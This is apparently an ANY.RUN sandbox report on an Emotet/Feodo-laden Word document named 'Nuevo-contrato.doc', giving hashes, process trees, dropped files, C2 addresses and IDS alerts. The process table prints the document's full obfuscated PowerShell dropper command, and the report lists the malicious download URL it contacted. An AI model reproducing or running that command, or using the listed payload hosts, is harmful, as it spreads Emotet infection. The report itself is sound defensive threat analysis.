analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Nuevo-contrato.doc

Full analysis: https://app.any.run/tasks/875645d5-286e-438e-9d6d-16b9d0c6da7f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 15:36:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Maya-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 7 16:48:00 2018, Last Saved Time/Date: Wed Nov 7 16:48:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

5DB4BA64B55D5E1595E14D156CE1B9C1

SHA1:

7AB3C1AE3A97D41D9B8AEC7E0A526D20C062D33F

SHA256:

931A1172056019346CD0BAF5AB8F81C50582ABB387A60649B149499BF51031DD

SSDEEP:

768:V7FLVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9Ok/1IDPjEed72c:VZLocn1kp59gxBK85fBt+a9+dS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2108)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2108)
    • Application was dropped or rewritten from another process

      • 509.exe (PID: 2416)
      • lpiograd.exe (PID: 1736)
      • 509.exe (PID: 888)
      • lpiograd.exe (PID: 3952)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3852)
    • Emotet process was detected

      • lpiograd.exe (PID: 1736)
    • FEODO was detected

      • lpiograd.exe (PID: 3952)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 3952)
    • Connects to CnC server

      • lpiograd.exe (PID: 3952)
    • EMOTET was detected

      • lpiograd.exe (PID: 3952)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3852)
    • Executes PowerShell scripts

      • CMD.exe (PID: 2252)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3852)
      • 509.exe (PID: 888)
    • Application launched itself

      • 509.exe (PID: 2416)
    • Starts itself from another location

      • 509.exe (PID: 888)
    • Connects to SMTP port

      • lpiograd.exe (PID: 3952)
    • Connects to unusual port

      • lpiograd.exe (PID: 3952)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2108)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2108)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:07 16:48:00
CreateDate: 2018:11:07 16:48:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Maya-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 509.exe no specs 509.exe #EMOTET lpiograd.exe no specs #FEODO lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
2108"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Nuevo-contrato.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2252CMD cmD /c "Set vPn=(NeW-OBjeCT io.cOmPREsSIon.DEflaTeSTream( [sySTeM.iO.MEmoRystREaM] [sYSTeM.cOnvErt]::frOMbASE64sTRing( 'PZBBb8IwDIX/Sg+RAmIkO8DEiCohwZAKE5tY2TjskgaXZjRJlaaEDfHfl6Kxm/X8+dl+SKbbWIPvm+wLhItW4MgHZNNSgnYMbV/nMS6cq8aUeu8JV0EGW1lZA5E6N3Qtkwef/kwnf1TGC8mFBe7kkRNhFPWnQg2WgxtQS6743krRlK6xUFmzawRcSRXKEmo64i/vu+XoNiEKbsM9uTm1FMks9VORP6vVMGn+19aK1zXfAyka6rdPGzlQ6xSTt6qUroMnuMtQsplFcYSH94+YocXGxAj0cexAVT38iXttv4cJnACz3IQPRNFBs4WLpI7aILpnZ7/PKARGZsbr0vDdXJZwZe6i1rDLEn00B+gnwfSqsCz4HNhFcCeK8+XyCw=='),[sYStEM.io.cOMPRESSION.coMprESSionmoDE]::decompResS)^|%{NeW-OBjeCT Io.sTREamReADEr($_, [sySteM.tExt.ENcodINg]::aScIi) } ^| %{ $_.rEadTOENd( ) })^|inVOKe-EXpreSSioN&&POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3852POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2416"C:\Users\admin\AppData\Local\Temp\509.exe" C:\Users\admin\AppData\Local\Temp\509.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
888"C:\Users\admin\AppData\Local\Temp\509.exe"C:\Users\admin\AppData\Local\Temp\509.exe
509.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
1736"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
509.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
3952"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
Total events
1 679
Read events
1 265
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2108WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9C5B.tmp.cvr
MD5:
SHA256:
3852powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\51M9051GWW1DP0YGNS8O.temp
MD5:
SHA256:
888509.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:6823E6E9A4321CFDA0767502921358E3
SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81
3852powershell.exeC:\Users\admin\AppData\Local\Temp\509.exeexecutable
MD5:6823E6E9A4321CFDA0767502921358E3
SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81
2108WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6D91E9BA10BE7484E49E380771F2FD60
SHA256:8038F61FD24C01152B1CA92CB2532880D10B68B637A378C6750D77DD73334427
2108WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$evo-contrato.docpgc
MD5:C60262EFC58172FF8F4A9FADF860B426
SHA256:B02467CC5DEE5BF11CC1F409954603BB96EFED281B379AF683507D804517051F
3852powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3852powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da7b5.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
29
DNS requests
26
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3852
powershell.exe
GET
200
132.148.249.54:80
http://www.amenterprise.info/RiI6wTzC/
US
executable
792 Kb
malicious
3852
powershell.exe
GET
301
132.148.249.54:80
http://www.amenterprise.info/RiI6wTzC
US
html
246 b
malicious
3952
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
148 b
malicious
3952
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
714 Kb
malicious
3952
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/
US
ini
53.1 Kb
malicious
3952
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/whoami.php
US
text
14 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3952
lpiograd.exe
47.157.181.81:443
Frontier Communications of America, Inc.
US
malicious
3852
powershell.exe
132.148.249.54:80
www.amenterprise.info
GoDaddy.com, LLC
US
suspicious
3952
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious
128.128.5.243:465
Woods Hole Oceanographic Institution
US
unknown
3952
lpiograd.exe
46.30.211.158:25
mail.one.com
One.com A/S
DK
unknown
3952
lpiograd.exe
212.227.15.167:587
smtp.1und1.de
1&1 Internet SE
DE
unknown
3952
lpiograd.exe
108.177.127.109:25
smtp.gmail.com
Google Inc.
US
whitelisted
3952
lpiograd.exe
138.128.178.74:587
mail.woodwardgroup.mx
HostDime.com, Inc.
US
unknown
3952
lpiograd.exe
178.77.104.159:465
vwp14345.webpack.hosteurope.de
Host Europe GmbH
DE
unknown
3952
lpiograd.exe
66.152.97.60:587
mail.powweb.com
Tech Valley Communications
US
unknown

DNS requests

Domain
IP
Reputation
www.amenterprise.info
  • 132.148.249.54
malicious
vwp14345.webpack.hosteurope.de
  • 178.77.104.159
unknown
mail.woodwardgroup.mx
  • 138.128.178.74
unknown
mail.one.com
  • 46.30.211.158
shared
pop.one.com
  • 46.30.211.110
  • 46.30.211.111
unknown
mail.powweb.com
  • 66.152.97.60
unknown
mail.maritimeservices.cl
  • 186.64.117.90
unknown
mail.indusquim.co
  • 190.8.176.235
unknown
smtp.outlook.com
  • 52.97.146.98
  • 40.100.173.50
  • 52.97.131.130
  • 52.97.131.178
shared
pop3.deaguirre.cl
  • 200.73.25.202
  • 200.27.90.68
unknown

Threats

PID
Process
Class
Message
3852
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3852
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3852
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3852
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3952
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3952
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3 ETPRO signatures available at the full report
No debug info